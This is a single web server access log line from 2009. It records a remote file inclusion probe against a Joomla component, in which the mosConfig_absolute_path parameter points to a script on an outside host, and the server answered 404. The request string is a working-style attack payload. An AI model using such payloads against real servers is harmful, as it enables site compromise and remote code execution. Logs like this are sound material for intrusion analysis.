83.98.209.71 - - [28/Jun/2009:01:54:10 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://aboutav.com//id2.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
